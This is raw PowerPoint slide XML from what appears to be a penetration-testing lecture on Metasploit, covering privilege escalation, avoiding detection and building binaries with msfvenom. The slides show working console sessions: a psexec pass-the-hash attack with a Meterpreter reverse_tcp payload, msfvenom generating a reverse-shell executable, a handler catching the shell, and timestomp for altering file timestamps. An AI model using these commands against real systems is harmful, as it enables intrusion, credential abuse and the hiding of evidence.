            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    Command       Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    -------       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>timestomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>     Manipulate file MACE attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217421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5F00F-F076-4719-A469-73A990EC9771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053126" y="1106223"/>
            <a:ext cx="9467909" cy="4219539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9064F77-5220-CB88-9F50-68CE36FC398C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259322" y="1338555"/>
            <a:ext cx="8347157" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set PAYLOAD windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>payload =&gt; windows/meterpreter/reverse_tcp</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set LHOST 192.168.1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST =&gt; 192.168.1.1</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set LPORT 443</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LPORT =&gt; 443</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set RHOST 192.168.1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RHOST =&gt; 192.168.1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . . SNIP . . .</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SMBPass</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SMBPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =&gt; aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Connecting to the server...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Started reverse handler</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Authenticating as user 'Administrator'...</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03AE8F71-1FE9-F278-91CE-C55DA7B73D3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77878" y="82294"/>
            <a:ext cx="3909613" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Privilege Escalation</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750862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F3967B-DCEA-BD59-DB98-B6A1F482D9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="795458" y="973653"/>
            <a:ext cx="10601084" cy="5541448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E255CCA0-4AD0-5187-3809-2BF99544EDC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168116" y="105353"/>
            <a:ext cx="3909613" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{237386D9-E3DC-ABCC-9643-CDCF98098367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099627" y="1212669"/>
            <a:ext cx="10601084" cy="5539978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>m3lomat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/opt/framework3/msf6# sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –p windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST=192.168.33.129 LPORT=443 X &gt; payload.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@m3lomat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/opt/framework3/msf6# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST=192.168.1.1 LPORT=443</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Please wait while we load the module tree...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Started reverse handler on 192.168.34.13:443</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Starting the payload handler...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Sending stage (748032 bytes)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Meterpreter session 1 opened (192.168.1.1:443 -&gt; 192.168.34.13:1056)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; getuid</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server username: IHAZSECURITY\m3lomatwindows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Process 2896 created.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Channel 1 created.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Windows 7 [Version 5.1.26]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(C) Copyright 1985-2001 Microsoft Corp.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt;net user m3lomatwindows </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . . SNIP . . .</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Local Group Memberships *Users</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Global Group memberships *None</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The command completed successfully.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt;^Z</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Background channel 1? [y/N] y</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3394259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15B-D575-E44D-CB98-0DDCBE8C9595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772378" y="324153"/>
            <a:ext cx="8647244" cy="244259"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A V O I D I N G  D E T E C T I O N</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7153C85E-40AB-EF93-0A29-5DE72920CDD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91859" y="877268"/>
            <a:ext cx="4908716"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effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creating Binaries With MSF-Venom</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
